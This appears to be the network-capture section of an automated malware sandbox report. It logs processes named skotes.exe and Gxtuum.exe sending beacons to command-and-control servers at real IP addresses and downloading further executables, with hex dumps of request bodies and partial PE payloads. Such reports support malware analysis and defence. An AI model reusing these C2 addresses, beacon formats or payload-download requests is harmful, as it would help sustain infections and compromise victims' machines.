                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849267960 CET1236INData Raw: 93 04 00 33 ff 48 89 7b 58 48 8b 4b 48 48 85 c9 74 05 e8 b8 93 04 00 48 89 7b 48 48 8b 4b 38 48 85 c9 74 05 e8 a6 93 04 00 48 89 7b 38 48 8b 4b 28 48 85 c9 74 05 e8 94 93 04 00 48 89 7b 28 48 8b 4b 18 48 85 c9 74 05 e8 82 93 04 00 48 89 7b 18 48
                                                                                                                                                                                                                                                              Data Ascii: 3H{XHKHHtH{HHK8HtH{8HK(HtH{(HKHtH{HKHtpH{HH\$0H _AAHDHHH(HIHtHPHtLHH(I H(
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.968723059 CET1236INData Raw: 10 00 0f 10 48 10 0f 11 46 10 0f 11 4e 20 48 8d 4d 0f e8 38 de 03 00 0f 10 08 0f 10 50 10 f2 0f 10 40 20 8b 48 28 0f 11 4e 30 0f 11 56 40 f2 0f 11 46 50 89 4e 58 48 89 37 48 8d 4d a7 e8 65 c0 03 00 48 8b 4d ff 48 85 c9 74 05 e8 ab 8e 04 00 4c 89
                                                                                                                                                                                                                                                              Data Ascii: HFN HM8P@ H(N0V@FPNXH7HMeHMHtLuHMHtLuHMHtLuHMHtuLuHMHtcLuHMHtQLuHML$I[(Is0IA^_]H*@SH


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              12192.168.2.449865185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:47.694097996 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019804001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:49.042620897 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:48 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              13192.168.2.449866212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:48.055377960 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:49.287766933 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:49 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              14192.168.2.44987231.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:49.166065931 CET61OUTGET /files/martin/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.948719025 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:50 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 4470272
                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 00:33:17 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67675e4d-443600"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c6 e7 66 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d4 4e 00 00 c6 74 00 00 32 00 00 00 70 c6 00 00 10 00 00 00 f0 4e 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 c6 00 00 04 00 00 2f 58 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 72 00 73 00 00 00 00 00 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 56 c6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 56 c6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfg(Nt2pN@/XD@ _rsrVV q(@.rsrcr(@.idata r(@ 8 r(@dsmoqcnp`Z(@yktdnnda`D@.taggant0p"D@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949004889 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949023008 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949157000 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949173927 CET896INData Raw: 43 3a cd ba fe 43 68 b3 bf ca 9f f2 82 2a 2d c6 a5 0e 17 c2 8a f6 65 73 e2 43 a7 6f fd 43 0b eb a9 12 ec 8c e0 02 31 95 91 cf 51 7d 9a c5 f8 c0 cb 43 f9 66 3a 42 66 a2 c0 c8 28 a2 7e c5 10 a3 21 91 2e fb d6 38 51 76 1f 8a fe 75 88 c8 be 83 14 be
                                                                                                                                                                                                                                                              Data Ascii: C:Ch*-esCoC1Q}Cf:Bf(~!.8Qvujibmhqk5EgmLMz%wq3YWv1MZ?2Yf~M[4*A1d~]_?BD~mvn<;49\k24{~s{~
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949198008 CET1236INData Raw: d4 18 1f 24 33 9e fb c5 c0 68 d0 51 22 80 11 33 00 3e 8f ab a0 5a 6f d2 ed 28 cf 84 ed ae d4 af c5 30 56 2c 21 27 45 a3 09 96 fb 97 65 ae c7 20 bd ea 6d 52 d7 dd 3c 63 57 5a 17 a6 19 de 3e a8 44 6c 47 5a 44 aa 46 1e 94 6e 40 35 38 5a af e1 19 68
                                                                                                                                                                                                                                                              Data Ascii: $3hQ"3>Zo(0V,!'Ee mR<cWZ>DlGZDFn@58ZhrG+^/k.2p>Bknmwq]98$Ev%EQhMXIvT^C^YG)jsX1y`J9UVb~WKYVD<vhFK-4f4??DF
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949235916 CET1236INData Raw: 7d 4e c7 30 be 88 30 2e 8a 53 72 54 cb 92 80 c5 00 3d 78 35 1a b6 f4 93 1b e9 73 df 54 83 57 14 fe 9e 6b c0 64 ca 4f f2 8a a8 e4 ab d6 7a 9e c6 9e 88 8d c4 95 c4 1f e8 11 94 2e 18 83 af 1c 04 ba 4c e7 7a 6b c1 f3 20 9e c7 9f 0e ef b6 a4 aa 7e 6f
                                                                                                                                                                                                                                                              Data Ascii: }N00.SrT=x5sTWkdOz.Lzk ~o9Q%?=U`u+v3r+y/aY1.UjxlM$i}F2MOTaF>l-V~a+Rys!||`.%XZ~wD?
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949253082 CET448INData Raw: 1a 2f 22 d3 55 e3 af 04 43 e2 39 81 a0 41 79 26 f8 a2 ab e9 f6 dc cc 2b 9b 26 e8 dd 34 7e cc e1 56 36 2b 47 b3 5b fd a2 51 8f 06 05 d5 ad 00 ad 05 3d 03 ae 51 f2 b5 15 74 0b f4 12 c3 4a 49 de 3b 09 12 da 3e 47 6f 6d 15 80 7a 3b 55 fb ea fe 40 4a
                                                                                                                                                                                                                                                              Data Ascii: /"UC9Ay&+&4~V6+G[Q=QtJI;>Gomz;U@J||FmH"j:jT2Jf|WwiZc:iQzKKs-QNI~CsiC0.D.@MI<(j#33yTv)FoBG$%$A7@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949801922 CET1236INData Raw: 47 45 7c 9b b1 9b 62 89 56 68 ed a4 25 b8 4d ac f1 2e 4d 7e a7 ea 45 b5 71 9e a5 0e 12 db 21 a4 56 26 41 c2 b7 8a bb c8 13 e6 26 a3 5e b6 b1 43 13 e9 a3 72 10 1a cd 44 55 6e 75 8c fc 33 c4 0c 5b ca 69 ae 29 55 b9 93 92 5c 50 e3 da d9 49 29 53 a0
                                                                                                                                                                                                                                                              Data Ascii: GE|bVh%M.M~Eq!V&A&^CrDUnu3[i)U\PI)S!"/c`<c4LH8.eXr>"Dk<[KoRQF"D`is-hxVx9n<MMKu~1+x_bU'!RVz-XcUEmi7N
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.949819088 CET1236INData Raw: ce 11 ae 57 7c ea 26 a8 3e 5e 1a 95 22 da 76 a6 3e 4d 4b 40 b1 be 29 34 65 97 26 29 80 06 21 d8 64 9e 6d 5f ac ae 98 1e 6c f7 28 7e a3 dc 4e eb ed 26 85 91 9d d2 48 41 05 8e 5d da 06 54 2b 30 74 22 0a cc 7f ce 50 4a 4a e4 35 f9 5c 0b 0b 76 b1 d4
                                                                                                                                                                                                                                                              Data Ascii: W|&>^"v>MK@)4e&)!dm_l(~N&HA]T+0t"PJJ5\vqOe#WQPV1vz6f&(=T|]WML?wf.oshM$L?w&fDCu_tG~_V;l|4=/B,wC=a/0z
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:50.950650930 CET1236INData Raw: 39 c4 48 ea 72 38 47 6c 3a b2 f9 8a 72 59 25 85 bc 88 77 df ab 7a d0 41 7e f9 0a 9e c2 dd 69 89 f1 cf c8 f0 7b 94 5e cb 46 c5 57 a6 f1 55 c8 f4 bc a0 54 6c 19 f9 02 99 fd 9e 41 74 2a 7e c0 13 ba 00 4f 4f db 4a 56 49 c6 a2 05 b6 bc 62 a3 6d 9d 86
                                                                                                                                                                                                                                                              Data Ascii: 9Hr8Gl:rY%wzA~i{^FWUTlAt*~OOJVIbm^}qQwD'KBvg*j+C*m@m!2WyY|<*J^),4~;6M6-m9xvwS8`D>xoc]?@+on


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              15192.168.2.449877212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:51.111654043 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.439240932 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:52 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              16192.168.2.449890212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:54.103455067 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:55.433109999 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:55 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              17192.168.2.449898212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:57.189160109 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:58.508353949 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:58 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              18192.168.2.449906185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:59.984644890 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019805001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:01.316099882 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:01 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              19192.168.2.449907212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:00.167881966 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:01.499394894 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:01 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              20192.168.2.44991431.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:01.471271038 CET62OUTGET /files/unique1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.799778938 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:02 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 4433408
                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 01:09:57 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "676766e5-43a600"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 07 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 49 00 00 4c 75 00 00 32 00 00 00 d0 c5 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 c6 00 00 04 00 00 39 49 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f b0 72 00 73 00 00 00 00 a0 72 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc b2 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c b2 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELcg(JILu2`I@9ID@ _rsr r4(@.rsrcrD(@.idata rF(@ 7rH(@wasfhoet@6J(@ygjteyurC@.taggant0"C@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.799901962 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.799940109 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.800086021 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.800122976 CET896INData Raw: 33 24 64 bc 6d ad f0 8d b0 d7 57 14 d2 46 23 84 c6 90 23 56 14 af f7 94 13 f2 70 93 ba 25 39 f1 ca 9c 5a 86 fc ec 47 f2 81 68 5f fa 1b 24 27 0f c8 25 02 ba 6a af 93 10 f4 c8 37 4a eb c8 1f 2d bf 36 e9 89 17 46 01 d7 4c 94 b9 4a f2 ae c3 87 ee cf
                                                                                                                                                                                                                                                              Data Ascii: 3$dmWF##Vp%9ZGh_$'%j7J-6FLJS\wH6tE:jeiG*oZn#FHmqGg}^O=+DOP;+r;[(h?;hRqa6x.Ok>t>[zv2lsO^on'
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.800158978 CET1236INData Raw: dd ec c0 47 fe 9e a6 a6 62 a4 23 10 0d fc 97 5a cc ad 42 d0 4e a6 7f 01 57 ac eb 49 30 c0 50 69 e6 d8 c9 5f f7 5f 9b 98 d8 ee 80 c4 e7 14 8e dc 64 cf e8 72 92 74 d3 24 94 7d c8 01 c6 4e 93 de de a0 7d 73 d2 7c 7c 31 32 30 62 1d 35 af 25 f8 5f e4
                                                                                                                                                                                                                                                              Data Ascii: Gb#ZBNWI0Pi__drt$}N}s||120b5%_CfrG[G$6?p*E^B$J}`Ww2"0F_VOWK5|^bRTl6+F9PN1QS1Y#l@0OrlY_{K3;`O0p`WkO7qX
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.800194025 CET1236INData Raw: 61 3f fc 7d 36 ab ba 17 ee 39 8a 7f dd 0e 09 39 00 a9 92 ef 91 af e9 65 97 4e ef 97 d9 f9 40 60 86 d4 7b 2d f2 0c 51 ca 8f 54 ff 11 39 a4 d2 09 1f 81 c0 51 50 0e 14 e7 b1 e0 41 06 d7 32 85 22 ca dc d2 55 af 2e 5e 56 63 80 ac ab 11 58 ea e5 ed 27
                                                                                                                                                                                                                                                              Data Ascii: a?}699eN@`{-QT9QPA2"U.^VcX'^B3rF@^Tc~8PP&S'CB00;h ,5ECEOA~UkZ^H9-P$zVfz-45?W(Rfwt^1uPa~^W?
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.800230026 CET1236INData Raw: 9a 9d 10 27 ed 45 b8 e7 33 6d 47 9d d1 be 0a 3b 4a ac 3f 94 f7 80 d5 a6 10 2d 70 9d 45 c9 47 57 e2 38 35 28 1d 5f 45 9d 41 5a e2 ee a5 0b fb 02 63 fc 7b a1 73 63 d4 e1 84 56 fc fd b3 ee 50 9d 12 83 87 98 39 38 3b 49 e2 bb a8 7e 25 50 38 bd 31 1b
